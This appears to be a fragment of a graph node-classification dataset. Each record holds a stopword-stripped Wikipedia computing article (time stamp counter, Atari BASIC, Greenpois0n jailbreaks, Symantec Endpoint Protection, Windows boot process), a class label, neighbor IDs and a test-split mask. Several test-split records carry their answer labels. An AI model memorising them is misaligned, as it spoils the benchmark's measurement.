list cli languages comprehensive set examples concept seen example ms embrace extend extinguish behaviour produced java-like languages c j instance work java code used libraries nevertheless classic windows ecosystem included considerable code would needed used within .net world role ms introduced well supported bridging system system included numerous utilities language features ease use windows visual basic code within .net system vice versa microsoft also introduced javascript bridging technology silverlight html bridge bridge exposes js types .net code .net types js code manages memory access safety similar bridging technologies often javascript one side common various platforms one example js bridge android os written example term also sometimes used describe object-relational mapping systems bridge divide sql database world modern object programming languages",
    "neighbors": [
      2304,
      3462,
      6664,
      7307,
      5677,
      10413,
      7983,
      10176,
      8262,
      8524,
      3790,
      847,
      3413,
      10465,
      10470,
      487,
      2804,
      3573,
      9467,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 5922,
    "label": 3,
    "text": "Time_Stamp_Counter:time stamp counter time stamp counter tsc 64-bit register present x86 processors since pentium counts number cycles since reset instruction codice_1 returns tsc edx eax x86-64 mode codice_1 also clears higher 32 bits rax rdx opcode codice_3 pentium competitors cyrix 6x86 always tsc may consider codice_1 illegal instruction cyrix included time stamp counter mii time stamp counter excellent high-resolution low-overhead way program get cpu timing information advent multi-core/hyper-threaded cpus systems multiple cpus hibernating operating systems tsc relied upon provide accurate results — unless great care taken correct possible flaws rate tick whether cores processors identical values time-keeping registers promise timestamp counters multiple cpus single motherboard synchronized therefore program get reliable results limiting run one specific cpu even cpu speed may change power-saving measures taken os bios system may hibernated later resumed resetting tsc latter cases stay relevant program must re-calibrate counter periodically relying tsc also reduces portability processors may similar feature recent intel processors include constant rate tsc identified kern.timecounter.invariant_tsc sysctl freebsd codice_5 flag linux codice_6 processors tsc ticks processor nominal frequency regardless actual cpu clock frequency due turbo power saving states hence tsc ticks counting passage time number cpu clock cycles elapsed windows platforms microsoft strongly discourages using tsc high-resolution timing exactly reasons providing instead windows apis codice_7 codice_8 posix systems program get similar function reading value codice_9 clock using codice_10 function starting pentium pro intel processors practiced out-of-order execution instructions necessarily performed order appear program cause processor execute codice_1 later simple program expects producing misleading cycle count programmer solve problem inserting serializing instruction cpuid force every preceding instruction complete allowing program continue using codice_12 instruction serializing variant codice_1 instruction intel processor families increment time-stamp counter differently specific processor configuration determines behavior constant tsc behavior ensures duration clock tick uniform makes possible use tsc wall clock timer even processor core changes frequency architectural behavior later intel processors amd processors k8 core always incremented time-stamp counter every clock cycle thus power management features able change number increments per second values could get sync different cores processors system windows amd provides utility periodically synchronize counters multiple core cpus since family 10h barcelona/phenom amd chips feature constant tsc driven either hypertransport speed highest p state cpuid bit codice_14 advertises operating system may provide methods use n't use codice_1 instruction time keeping administrator control example versions linux kernel seccomp sandboxing mode disables codice_1 also disabled using codice_17 argument codice_18 system call time stamp counter used time instructions accurately exploited meltdown spectre security vulnerabilities however available counters timers used case arm processors vulnerable type attack processors also registers count cpu clock cycles different names instance avr32 called performance clock counter pccnt register sparc v9 provides codice_19 register armv7 armv8 architectures provide generic counter counts constant frequency powerpc provides 64-bit codice_20 register",
    "neighbors": [
      8322,
      6924,
      4237,
      6926,
      7313,
      3109,
      7983,
      9911,
      823,
      3027,
      2517,
      1515,
      5356,
      9964,
      7538,
      499,
      372,
      1399,
      5754,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 5923,
    "label": 2,
    "text": "CheckInstall:checkinstall checkinstall computer program unix-like operating systems eases installation uninstallation software compiled source making use package management systems software compilation automatically generate slackware- rpm- debian-compatible package later cleanly uninstalled appropriate package manager checkinstall monitors installation phase normal software build process notes files added system builds package contains files using additional information gathered user finally files installed original run removed package installed using system package tools package properly registered local installed packages database primary benefits provided checkinstall versus simply running codice_1 ability remove package system using system packaging tools ability install resulting package multiple machines checkinstall sometimes cited mechanism creating packages open source projects lieu creating numerous platform-specific build packages checkinstall usually used running configure script codice_2 follows entering information author package description get folder generated package saved",
    "neighbors": [
      10149,
      5096,
      5067,
      4398,
      5492,
      5397,
      4309,
      5656,
      8954
    ],
    "mask": "None"
  },
  {
    "node_id": 5924,
    "label": 4,
    "text": "Symantec_Endpoint_Protection:symantec endpoint protection symantec endpoint protection developed symantec security software suite consists anti-malware intrusion prevention firewall features server desktop computers largest market-share product endpoint security first release symantec endpoint protection published september 2007 called version 11.0 endpoint protection result merger several security software products including symantec antivirus corporate edition 10.0 client security network access control sygate enterprise edition endpoint protection also included new features example block data transfers unauthorized device types usb flash drives bluetooth devices time symantec antivirus corporate edition widely criticized become bloated unwieldy endpoint protection 11.0 intended address criticisms disk footprint symantec corporate edition 10.0 almost 100 mb whereas endpoint protection projected 21 mb 2009 symantec introduced managed service whereby symantec staff deploy manage symantec endpoint protection installations remotely small business edition faster installation process released 2010 february 2011 symantec announced version 12.0 endpoint protection version 12 incorporated cloud-based database malicious files called symantec insight insight intended combat malware generates mutations files avoid detection signature-based anti-malware software late 2012 symantec released version 12.1.2 supports vmware vshield cloud version endpoint protection released september 2016 followed version 14 november version 14 incorporates machine learning technology find patterns digital data may indicative presence cyber-security threat also incorporates memory exploit mitigation performance improvements symantec endpoint protection security software suite includes intrusion prevention firewall anti-malware features according sc magazine endpoint protection also features typical data loss prevention software typically installed server running windows linux macos 2018 version 14 currently-supported release endpoint protection scans computers security threats used prevent unapproved programs running apply firewall policies block allow network traffic attempts identify block malicious traffic corporate network coming web browser uses aggregate information users identify malicious software 2016 symantec claims use data 175 million devices installed endpoint security 175 countries endpoint protection administrative console allows department modify security policies department programs files exclude antivirus scans manage mobile devices directly treats peripherals connected computer protects computer malicious software mobile device early 2012 source code symantec endpoint protection stolen published online hacker group called lords dharmaraja claimed credit alleging source code stolen indian military intelligence indian government requires vendors submit source code computer program sold government ensure used espionage july 2012 update endpoint protection caused compatibility issues triggering blue screen death windows xp machines running certain third-party file system drivers 2014 offensive security discovered exploit symantec endpoint protection penetration test financial services organization exploit application device control driver allowed logged-in user get system access patched august according gartner symantec endpoint protection 14 one comprehensive endpoint security products available regularly scores well independent tests however common criticism customers fatigued near constant changes product company direction sc magazine said enpoint protection 14 comprehensive tool type superb installation documentation review said endpoint protection no-brainer setup administration wart support fees bit steep forrester said version 12.1 complete endpoint security software product market different security functions software well-integrated report speculated lack integration would addressed version 14 network world ranked symantec endpoint protection sixth endpoint security products based data nss labs testing",
    "neighbors": [
      2049,
      2563,
      6153,
      1052,
      9762,
      550,
      10790,
      2601,
      6699,
      8753,
      569,
      7228,
      9279,
      10308,
      2118,
      2654,
      8816,
      10872,
      9341,
      127,
      7809,
      131,
      1172,
      10903,
      6297,
      156,
      2721,
      2213,
      6823,
      3243,
      1708,
      8368,
      6834,
      704,
      10433,
      7362,
      202,
      4814,
      8398,
      9423,
      10451,
      1242,
      6364,
      5860,
      10987,
      5356,
      8943,
      9971,
      1273,
      9983,
      1792,
      5380,
      7955,
      4374,
      9496,
      6431,
      10531,
      1318,
      8998,
      297,
      2859,
      3885,
      7983,
      4403,
      2870,
      823,
      11065,
      9537,
      1858,
      11073,
      4421,
      2378,
      1355,
      10574,
      4953,
      2907,
      7515,
      9055,
      9569,
      3942,
      11622,
      3955,
      8572,
      4480,
      5512,
      1417,
      3482,
      4511,
      8614,
      8615,
      10166,
      3520,
      5057,
      5069,
      7121,
      10708,
      2005,
      4568,
      11225,
      8668,
      9713,
      6643
    ],
    "mask": "Test"
  },
  {
    "node_id": 5925,
    "label": 9,
    "text": "Atari_BASIC:atari basic atari basic interpreter basic programming language shipped atari 8-bit family 6502-based home computers unlike basics home computer era atari basic derivative microsoft basic differs significant ways includes keywords atari-specific features lacks support string arrays example language originally 8 kb rom cartridge first machines 8-bit series 400 800 1200xl starting 600xl 800xl basic built-in machines disabled holding codice_1 key booting xegs disables basic powered without keyboard attached complete annotated source code design specifications atari basic published atari basic source book 1983 machines would become atari 8-bit family originally developed second-generation video game consoles intended replace atari 2600 ray kassar new president atari decided challenge apple computer building home computer instead meant designs among changes needed support basic programming language standard language home computers 1978 atari purchased source code mos 6502 version microsoft 8k basic original 8k basic referred memory footprint compiled intel 8080 instruction set lower code density 6502 expanded code 9 kb slightly larger natural 8 kb size atari rom cartridges atari felt also needed expand language add better support specific hardware features computers similar apple done applesoft basic increased size 9 kb around 11 kb paring code 11 8 kb fit rom turned significant problem adding problem fact 6502 code supplied microsoft undocumented six months later almost ready shippable version interpreter however atari facing january 1979 deadline consumer electronics show ces machines would demonstrated decided ask help get version basic ready time show september 1978 shepardson microsystems bid completing basic shepardson written number programs apple ii family used 6502 processor middle finishing new basic cromemco s-100 bus machines cromemco 32k structured basic shepardson examined existing work decided difficult continue cutting size instead recommended developing completely new version originally 10k size make fit 8k rom common routines would moved operating system roms atari accepted proposal specifications finalized october 1978 paul laughton kathleen o'brien began work new language contract specified delivery date 6 april 1979 also included file manager system later known dos 1.0 atari plans take early 8k version microsoft basic 1979 ces switch new atari basic production development proceeded quickly helped bonus clause contract 8k cartridge available release machines atari took version ces instead ms version atari microsoft basic later became available separate product version shepardson gave atari ces demo supposed final version time delivered demo final delivery weeks later shepardson found several bugs code developed fixes however unknown shepardson atari already sent ces version manufacturing version later known revision among several problems version contains major bug subroutine copies memory deleting lines code exactly 256 bytes long causes lockup sometimes known two-line lockup trigger next line code command entered notorious one problems could fixed pressing key revision b attempted fix major bugs revision released 1983 built-in rom 600xl 800xl models fixing memory copying bug programmer noticed pattern code section inserting lines applied fix fix instead introduced original bug code inserting new lines much common deleting old ones change dramatically increased number crashes another major problem revision b bug added 16 bytes memory program every time codice_2d codice_3ed eventually causing machine run memory even smallest programs mapping atari described awesome bugs advised revision b owners n't fool around get new rom available cartridge atari book provided type-in program patch revision b revision c without cartridge revision c finally eliminated memory leaks revision b version built-in later versions 800xls xe computers xegs revision c also available cartridge production run version determined typing codice_4 ready prompt result codice_5 revision codice_6 revision b codice_7 revision c. atari basic uses line editor like home computer basics unlike basics atari basic scans just-entered program line reports errors immediately error found editor re-displays line highlighting text near error inverse video errors displayed numeric codes descriptions printed manual program lines entered starting line number insert new line amend existing one lines without line number executed immediately programmer types codice_8 program executes lowest line number atari basic allows commands executed modes instance codice_9 command used inside program list statement used display either entire basic program section program lines specifying starting ending line separated comma used output program listing printer program lines logical lines three screen lines physical lines 40 characters 120 characters total cursor moved freely lines unlike basics cursor moved left right editor os handles tracking whether physical line flowed next logical line moving cursor could move within logical lines automatically pressing sends tokenizer logical line cursor sits example pictured codice_10 author needs fix error move cursor codice_11 type editor overwrite mode hit common editing technique say renumbering lines atari basic built-in renumbering command one quickly learn overwrite numbers set lines hit repeatedly put back program atari basic uses token structure handle lexical processing better performance reduced memory size contrast ms-derived basics perform tokenization line-by-line basis program runs atari basic occurs user hits immediate syntax checking described program editing section side effect converting line tokenized form stored shepardson referred early-tokenizing concept pre-compiling interpreter tokenizer converts lines using small buffer memory program stored parse tree token output buffer addressed pointer lomem – 80 81 256 bytes tokenized statement larger buffer generates error 14 – line long output tokenizer moved permanent storage various locations memory set pointers addresses indicates locations variables stored variable name table pointed vntp – 82 83 values stored variable value table pointed vvtp – 86 87 indirecting variable names way reference variable needs two bytes address entry appropriate table strings area pointed starp – 8c 8d runtime stack pointed runstk – 8e 8f used store line numbers looping statements codice_12 subroutines codice_13 finally end basic memory usage indicated address stored memtop – 90 91 pointer atari basic uses unique way recognize abbreviated reserved words keyword abbreviated using period point writing codice_14 expanded codice_9 codice_16 expand abbreviation tokenizer searches list reserved words find first matches portion supplied commonly used commands occur first list reserved words codice_17 beginning typed codice_18 program later codice_9ed always write full words three exceptions codice_20 synonym codice_21 codice_22 synonym codice_23 codice_24 synonym empty string mean thing separate tokens remain program listing keywords communicating peripherals see input/output section codice_25 codice_26 codice_27 actually part tokenized keyword separate symbol example codice_20 codice_29 thing presented differently atari basic includes 12 functions mathematical trigonometric calculations tan function included may derived via exp function deg rad used set whether trigonometric functions use radians degrees radians default rnd function generates number 0 1 parameter function used number derived via pokey random number register address d20a atari basic differs considerably microsoft-style basics way handles strings microsoft basic mostly copied string-handling system dec basic-plus strings first-class types variable bounds allows string variables well arrays strings represented internally computer word pointing storage heap contrast atari basic copied string-handling system hewlett-packard basic basic data type single character strings arrays characters side-effect design true string arrays string variable must dimensioned used example program 20 character string reserved characters excess string length truncated maximum possible length string atari basic 32,768 characters ms basic included function accessing bits strings instance codice_30 would return leftmost 10 characters codice_31 atari basic string represented array access using array indexing functions equivalent statement atari basic would codice_32 note arrays 1-indexed 0-indexed modern variations slicing syntax two-dimensional arrays basics way define work arrays strings atari basic initialize array variables string array may contain whatever random data present memory allocated following trick allows fast string initialization also useful clearing large areas memory unwanted garbage numeric arrays cleared slow ... next loop string concatenation atari basic works following example target string must large enough hold combined string error result input statement used prompt array variables latter must filled indirectly via statement like 20 input b 1 =a array variables atari basic also may contain two subscripts strings included data statements enclosed quote marks atari basic result also possible data items contain comma read statement also used array variables arrays base index 0 statement dim 10 actually creates 11-element array elements 0-10 atari os includes subsystem peripheral device input/output i/o known cio central input/output programs written independently device might use conform common interface rare home computers time new device drivers could written fairly easily would automatically available atari basic program using atari os existing drivers could supplanted augmented new ones replacement example could displace one rom provide 80-column display piggyback generate checksum whenever line returned used verify type-in program listing atari basic supports cio access reserved words routines os graphics fill draw available specific basic keywords line drawing supported command providing area fill fill feature used general cio entry point called using basic command basic statement prepares device i/o access means ensure channel 1 free call driver prepare device set cassette tape spools onto tension advance heads keeping cassette tape player paused means read codes write read-and-write third number auxiliary information set 0 needed name device filename filename ignored cassette driver physical devices numbers mainly disks printers serial devices might plotter daisy-wheel printer may one disk drive present 1 assumed lprint statement used output strings printer atari basic include equivalent microsoft basic get inkey commands detect keypress simulated either pokeing keyboard driver directly opening file e.g open 1,4,0 k get 1 although latter wait keypress unlike get inkey typing codice_33 basic exit atari dos command menu unsaved programs lost command display disk directory within basic must done exiting dos dos occupies roughly 5k memory thus cassette-based atari machine 48k greater around 37,000 bytes free basic program memory 32,000 bytes dos present basic use extra ram xl xe machines atari basic built-in support sound via statement graphics joysticks paddles n't supplied command fill arbitrary shape pixels limited operating system function exists called command also commands drawing lines graphics primitives combination plot drawto statements used draw lines dedicated command clearing screen atari basic usually done prints clear screen control code analogous commodore basic atari basic include tab function simulated either pokeing cursor column position 55 tab position c9 default value 10 changed values take effect print statement executed also spc function atari basic advanced aspects hardware player/missile graphics sprites redefined character sets setting color palette/luminance tables scrolling custom graphics modes supported basic require machine language routines peek/poke statements graphics modes accessed basic atari 400/800 os roms support way access machine language setting antic registers display list manually os roms xl/xe added support modes bitmap modes basic normally set text window occupying last three rows bottom screen user may display prompts enter data program 16 added mode number invoked via graphics statement entire screen bitmap mode e.g graphics 8+16 bitmap mode full screen invoked atari basic automatically switch back text mode program execution terminated unlike many basics leave user bitmap mode unreadable screen switched via typing blind command resetting computer bitmap coordinates calculated range 1 maximum row/column minus one thus mode 6 160x192 maximum coordinates pixel 159 191 user goes allowed coordinates mode basic exit error unlike ms-derived basics atari basic allows numeric variables expressions used supply line numbers codice_22 codice_35 commands used clarify code instance subroutine clears screen could written codice_36 much easier understand typical codice_37 particular subroutine executed frequently placing line number variable also improve execution speed faster basic look constant variable instead processing time statement executed basics era allow codice_9 command send source code printer device atari basic also includes codice_39 command reads source code device merges back program user typed allows programs saved sections reading using codice_39 merge replace existing code carefully using blocks line numbers overlap programmers build libraries subroutines merge new programs needed atari basic call machine code subroutines machine code generally stored strings anywhere memory code needs position independent 256-byte page 6 area starting address 1536 600 used basic operating system code loaded page 6 reading codice_41 statements machine code invoked codice_42 function first parameter address machine code routine following values parameters example machine language code stored string named codice_43 called parameters parameters pushed onto hardware stack 16-bit integers order specified codice_42 function low byte high byte order last value pushed stack byte indicating number arguments machine language code must remove values returning via codice_45 instruction value returned basic program placing addresses 212 213 d4 d5 16-bit integer running original hardware atari basic slower home computer basics often large amount two widely used benchmarks era byte magazine sieve eratosthenes creative computing benchmark test written david h. ahl atari much slower apple ii even sinclair zx81 finishing near end list terms performance despite atari cpu running 1.79 mhz twice speed 6502-based computers language slowness stemmed two problems first numeric values basic stored floating-point binary coded decimal bcd format includes numbers integers like line numbers array indexes every time number encountered interpreter convert bcd format internal binary representation using routines operating system floating point math routines atari slow notably bcd binary conversion function affected programs byte benchmark constant conversion array indexes greatly slows program ahl benchmark single exponent operation loops poorly optimized multiplication function responsible much machine poor showing second problem due atari basic implemented loops branches perform branch codice_22 codice_35 interpreter searches entire program matching line number needs atari already slowed need convert numbers binary however serious problem case codice_48 ... codice_49 loop interpreters would push pointer location codice_48 stack reached codice_49 could easily return codice_48 atari basic location memory placed stack line number meant every time codice_49 encountered system search entire program find line loops atari basic program cause large loss performance relative basics several basics atari addressed issues resulting large performance gains basic xl reduced time byte benchmark 194 58 seconds three times fast accomplished caching location codice_54 loops basics cache also used codice_22 codice_35 improvements turbo-basic xl included similar caching well re-written high-performance floating-point library ahl benchmark atari basic required 405 seconds exactly code turbo basic took 41.6 seconds",
    "neighbors": [
      5635,
      3718,
      7691,
      1805,
      9997,
      6289,
      786,
      11412,
      22,
      3736,
      3481,
      9881,
      797,
      3233,
      11683,
      8101,
      4136,
      10666,
      8494,
      303,
      7343,
      7983,
      11315,
      315,
      7355,
      7486,
      7870,
      4160,
      4674,
      10750,
      712,
      847,
      1879,
      92,
      11229,
      2915,
      9188,
      5733,
      11243,
      2541,
      8429,
      7281,
      5747,
      759,
      6778,
      6910,
      1535
    ],
    "mask": "Test"
  },
  {
    "node_id": 5926,
    "label": 9,
    "text": "Modem_script:modem script modem script settings file software programs use communicate modem also known ccl files connection control language files like modem init string modem scripts files provide modem configuration settings modem scripts go beyond init strings providing internal scripting language script authors use tune modem response main use terminal emulators dialers",
    "neighbors": [
      1121,
      5281,
      8262
    ],
    "mask": "Test"
  },
  {
    "node_id": 5927,
    "label": 4,
    "text": "Greenpois0n:greenpois0n greenpois0n name shared series ios jailbreaking tools developed chronic dev team sometimes called greenpois0n team use exploits remove software restrictions iphones ipads ipod touches apple tvs greenpois0n initial release october 2010 jailbroke ios 4.1 second version february 2011 jailbroke ios 4.2.1 well ios 4.2.6 cdma iphones second generation tool greenpois0n absinthe developed iphone dev team members jailbroke ios 5.0.1 january 2012 providing first jailbreak iphone 4s second version jailbroke ios 5.1.1 may 2012 providing first jailbreak third generation ipad jailbreaking enables root access ios operating system allowing installation applications customizations unavailable official app store ios jailbreaking voids device warranty apple releases ios updates make jailbreaking difficult october 12 2010 chronic dev team released greenpois0n desktop-based tool jailbreaking ios 4.1 iphone 4 iphone 3gs ipod touch third fourth generation ipad 1 development apple released second generation apple tv greenpois0n developers reported could jailbreak apple tv well developers announced plans release october 10 news spread another jailbreak developer george hotz preparing release jailbreaking tool called limera1n would perform similar function different exploit greenpois0n developers delayed order integrate limera1n exploit supported devices using limera1n also meant original greenpois0n exploit shatter could saved use later jailbreaks shatter limera1n boot rom exploits means patched ios updates boot rom code embedded ios devices manufacturing february 2011 chronic dev team released new version greenpois0n jailbreak ios 4.2.1 jailbreak ios 4.2.6 cdma verizon iphone 4 desktop-based tools os x microsoft windows linux provides untethered jailbreak means jailbroken device rebooted without computer assistance supports ipad iphone ipod touch apple tv chronic dev team announced support newly released cdma iphone 4 devices stores developers chronic dev team iphone dev team released greenpois0n absinthe sometimes simply known absinthe january 2012 desktop-based tool os x microsoft windows linux jailbreak iphone 4s first time ipad 2 second time ios 5.0.1 devices also ios 5.0 iphone 4s absinthe provides untethered jailbreak means jailbroken device rebooted without computer assistance incorporated untether exploit called corona pod2g released december older ios devices next web said jailbreak took long time released venturebeat said absinthe n't easy use earlier jailbreaking tool jailbreakme according iphone dev team approximately one million devices newly jailbroken three days absinthe release developers called joint effort jailbreak dream team apple credited document listing security patches subsequent version ios may 2012 developers chronic dev team iphone dev team released absinthe 2.0 os x windows linux jailbreak ios 5.1.1 untethered iphone ipad ipod touch models support ios 5.1.1 including jailbreaking third generation ipad first time announced hack box security conference amsterdam end presentation earlier absinthe jailbreak initially support recently released model ipad 2 according chronic dev team approximately one million devices jailbroken weekend friday release pc world noted devices jailbroken tools absinthe 2.0 security concern companies bring device policies",
    "neighbors": [
      9732,
      5191,
      456,
      6537,
      9063,
      6539,
      6797,
      9518,
      7983,
      3473,
      7697,
      10838,
      823,
      2811,
      700,
      4957
    ],
    "mask": "Test"
  },
  {
    "node_id": 5928,
    "label": 2,
    "text": "Windows_NT_6_startup_process:windows nt 6 startup process startup process windows nt 6 windows vista windows server 2008 successors differs startup process part previous versions windows article unless otherwise specified said windows vista also applies later nt operating systems windows vista boot sector uefi loads windows boot manager file named bootmgr either system boot partition accesses boot configuration data store uses information load operating system bcd invokes boot loader turn proceeds initiate windows kernel initialization point proceeds similarly previous windows nt versions windows vista introduces complete overhaul windows operating system loader architecture earliest known reference revised architecture included within powerpoint slides distributed microsoft windows hardware engineering conference 2004 operating system codenamed longhorn documentation mentions windows operating system loader would undergoing significant restructuring order support efi major overhaul legacy code new boot architecture completely replaces ntldr architecture used previous versions windows nt steps follows nt kernel loaded including kernel initialization user-space initialization kept earlier nt systems refactoring winlogon resulted gina completely replaced credential providers graphical components windows vista later boot configuration data bcd firmware-independent database boot-time configuration data used microsoft new windows boot manager replaces boot.ini used ntldr boot configuration data stored data file format windows registry hives eventually mounted registry key hkey_local_machine\\bcd00000 restricted permissions uefi boot file located codice_1 efi system partition traditional bios boot file codice_2 active partition boot configuration data may altered using command-line tool bcdedit.exe using registry editor regedit.exe using windows management instrumentation third-party tools easybcd bootice visual bcd editor boot configuration data contain menu entries presented windows boot manager boot.ini contained menu entries presented ntldr menu entries include boot configuration data allows third-party integration anyone implement tools like diagnostics recovery options windows boot manager invokes winload.exe—the operating system boot loader—to load operating system kernel executive ntoskrnl.exe core device drivers respect winload.exe functionally equivalent operating system loader function ntldr prior versions windows nt uefi systems file called codice_3 file always located codice_4 computer recently hibernated codice_5 instead invoke codice_6 difference alternate boot mode splash screen displaying resuming windows uefi systems file called codice_7 always located codice_4 advent new boot manager windows vista many components changed one advanced boot options menu provides options advanced boot modes i.e safe mode due implementation hybrid boot windows 8 access advanced boot options menu disabled default however access still possible bcd modification possible boot modes abo menu accessible rapidly pressing holding codice_11 key windows boots",
    "neighbors": [
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      3109,
      7207,
      1577,
      10281,
      2101,
      10812,
      3648,
      7754,
      10828,
      4173,
      4174,
      9808,
      10839,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      7796,
      7290,
      4731,
      10879,
      8841,
      2193,
      9874,
      10900,
      4248,
      9377,
      3235,
      4771,
      6820,
      1703,
      5300,
      2749,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      3308,
      10993,
      3834,
      2811,
      1791,
      8959,
      11519,
      3856,
      8976,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      10024,
      3881,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      2901,
      4439,
      5465,
      7515,
      2402,
      4458,
      6506,
      9593,
      2943,
      1418,
      5003,
      5004,
      11677,
      929,
      11683,
      430,
      6062,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "None"
  },
  {
    "node_id": 5929,
    "label": 1,
    "text": "MultiValue:multivalue multivalue type nosql multidimensional database typically considered synonymous pick database originally developed pick operating system multivalue databases include commercial products rocket software zumasys revelation ladybridge intersystems northgate information solutions ongroup companies databases differ relational database features support encourage use attributes take list values rather attributes single-valued often categorized mumps within category post-relational databases although data model actually pre-dates relational model unlike sql-dbms tools multivalue databases accessed without sql nelson designed multivalue data model early mid-1960s dick pick developer trw worked first implementation model us army 1965 pick considered software public domain written military first dispute regarding multivalue databases addressed courts ken simms wrote databasic sometimes known s-basic mid-70 based dartmouth basic enhanced features data management simms played lot star trek developing language order language function satisfaction three implementations multivalue pick version r77 microdata reality 3.x prime information 1.0 similar spite attempts standardize particularly international spectrum spectrum manufacturers association designed logo use standards across multivalue implementations subsequently flavors diverged although cross-over streams multivalue database development could classified one stemming pick r83 one microdata reality one prime information differences implementations provisions supporting several flavors languages attempt document similarities differences found post-relational database reference prdb marketing groups others industry years classified multivalue databases pre-relational post-relational relational embedded detractors often classifying legacy could classified nosql data model aligns well json xml permits access without use sql one reasonable hypothesis data model lasting 50 years new database implementations model even 21st century provides inexpensive database solutions historically industry benchmarks tied sql transactions difficult hypothesis test although considerable anecdotes failed attempts get functionality multivalue application relational database framework spite history 40 years implementations starting trw many multivalue industry remained current various multivalue implementations employ object-oriented versions data/basic support ajax frameworks one needs use sql databases fit nosql umbrella fact multivalue developers first acquire nosql domain names likely prior database products classifying offerings nosql well multivalue seasoned data model several vendors competing multivalue space continuously enhanced years multivalue database system data stored using two separate files file store raw data dictionary store format displaying raw data example assume file table called person file attribute called emailaddress emailaddress field store variable number email address values single record list joe example.com jdb example.net joe_bacde example.org stored accessed via single query accessing associated record achieving one-to-many relationship within traditional relational database system would include creating additional table store variable number email addresses associated single person record however modern relational database systems support multi-value data model example postgresql column array base type like java programming language typical data/basic compiler compiles p-code runs p-machine jbase notable exception many different implementations compilers multivalue databases like php programming language data/basic language typecasting programmer known english access aql uniquery retrieve cmql many names years corresponding different multivalue implementations multivalue query language differs sql several respects query issued single dictionary within schema could understood virtual file portal database view data statement would list e-mail addresses person whose last name starts van single entry would output person multiple lines showing multiple e-mail addresses without repeating data person",
    "neighbors": [
      7076,
      8644,
      9286,
      9828,
      10471,
      5677,
      974,
      10413,
      8340,
      2901,
      9397,
      6809,
      8539,
      3644,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 5930,
    "label": 2,
    "text": "USB_image:usb image usb image — bootable image operating system os software boot loader located usb flash drive another usb device memory storage instead conventional cd dvd discs operating system loads usb device either load much like live cd runs os software storage installs os usb image runs usb device whole time usb image easier carry stored safely conventional cd dvd drawbacks older devices may support usb booting usb storage devices lifespan might shortened ubuntu included utility installing operating system image file usb flash drive since version 9.10 windows support also added step step set usb device bootable drive",
    "neighbors": [
      1515,
      6012,
      1150,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 5931,
    "label": 2,
    "text": "Timothee_Besset:timothee besset timothée besset french software programmer also known ttimo best known supporting linux well macintosh ports id software products involved game ports various id properties past ten years starting quake iii arena since development doom 3 also charge multiplayer network code various aspects game coding id role heavily involved development online game quakelive occasionally called zerowing never gone name derived community oriented system zerowing.idsoftware.com linux port pages prominent system actually named christian antkow based zero wing meme besset grew france started programming early 1990s school majored computer science well pursuing courses chemistry mechanics fluid mechanics school also first introduced linux originally system administration networking eventually adopting main system first serious game development project working qeradiant free game editor tool id software games work editor got know robert duffy point working contractor id got hired full-time duffy managed secure timothee contract work new cross-platform gtkradiant editor project 2000 eventually led timothee hired become id official linux port maintainer took back support rights linux release quake iii arena floundering loki software first actual porting project came release return castle wolfenstein 2001 linux client released march 16 2002 followed year later release linux builds sharing release date windows release next porting work came release doom 3 releasing first linux builds october 4 2004 around time also assumed responsibility becoming charge network coding id october 20 2005 released linux binaries quake 4 followed releasing source code gtkradiant gnu general public license february 17 2006 next porting project porting linux binaries released october 19 2007 also worked quake live project game entering invitation-based closed beta 2008 open beta february 24 2009 linux macintosh support coming august 18 2009 response fears linux gaming community id would abandon linux future titles september 13 2009 well publicized statement reaffirmed id support linux stating blog fundamentally nothing changed policy regarding linux games ... 'll damned n't find time get linux builds done january 2012 besset resigned id software ending hope future linux builds though doom 3 bfg edition came linux via source port year later john carmack revealed zenimax media n't policy 'unofficial binaries prevented id software pursuing sort third-party builds past linux ports experimental releases suggested use wine instead july 2 2012 announced joined frozen sand currently developing urban terror hd september 2016 ported rocket league steamos/linux help ryan c. gordon",
    "neighbors": [
      1026,
      5644,
      6797,
      4367,
      8848,
      657,
      10642,
      1939,
      2581,
      3478,
      6808,
      7450,
      6302,
      7584,
      802,
      5410,
      6691,
      6947,
      8354,
      8364,
      1717,
      823,
      2109,
      11069,
      10687,
      10822,
      8263,
      9034,
      843,
      589,
      6352,
      4177,
      11602,
      8787,
      4437,
      6489,
      3802,
      4831,
      1632,
      9696,
      11232,
      7793,
      1394,
      1396,
      3189,
      11643
    ],
    "mask": "None"
  },
  {
    "node_id": 5932,
    "label": 4,
    "text": "SF_City_ID_Card:sf city id card sf city id card municipal identification card program operated san francisco california residents city-county regardless immigration status cards also specify person gender assist transgender individuals often difficulty identification documents stated purpose photo id card streamline access city programs connect residents local businesses program modeled similar program operating new connecticut since 2007 according sf city id card website users card use cards accepted licenses drive purchase alcohol tobacco recognized federal state law possession cards considered mandatory city government applicants must submit proof identity city residency parents may obtain card minor separate cards children 13 anyone 14 years age older fee ranging 5 15 charged card expiration card occurs every 2 years cardholder turns 14 years age loses residency city limits supervisor tom ammiano said card public safety measure make residents living social margins likely seek help police well giving access banking services city bound law keep names private information confidential “ maximum extent permitted applicable laws ” according city attorney office early months 2007 immigration customs enforcement ice conducted dozens raids us conducted arrest deportation hundreds immigrants one states affected california latin american alliance immigrant rights aliadi bay area based grassroots organization founded miguel robles conformed local leaders like ramon cardona attorney daniel luna miguel perez julio garcia among others organized press conference san francisco city hall request order materialize sanctuary status city county san francisco city officials must issue resident identification card improve interaction community members regardless migratory status police officers well allow san francisco residents access city services open bank accounts aliadi started conversations supervisors chris daly gerardo sandoval tom ammiano supervisor chris daly showed interest political reasons could n't sponsor gerardo sandoval interested chief staff lupita peimbert suggested aliadi ask supervisor tom ammiano showed interest finally supported concept aliadi gathered 40 grassroots organizations non profits saw city id card tool improve life clients members concept adopted san francisco aliadi organized february 16 2008 women building first 3 conferences called cities integrating communities 1st event attended 100 organizers spark launch campaigns support city identification cards richmond santa clara county oakland los angeles detroit chicago minneapolis among others aliadi invited present experiences ordinance authorizing county clerk issue id card passed board supervisors november 20 2007 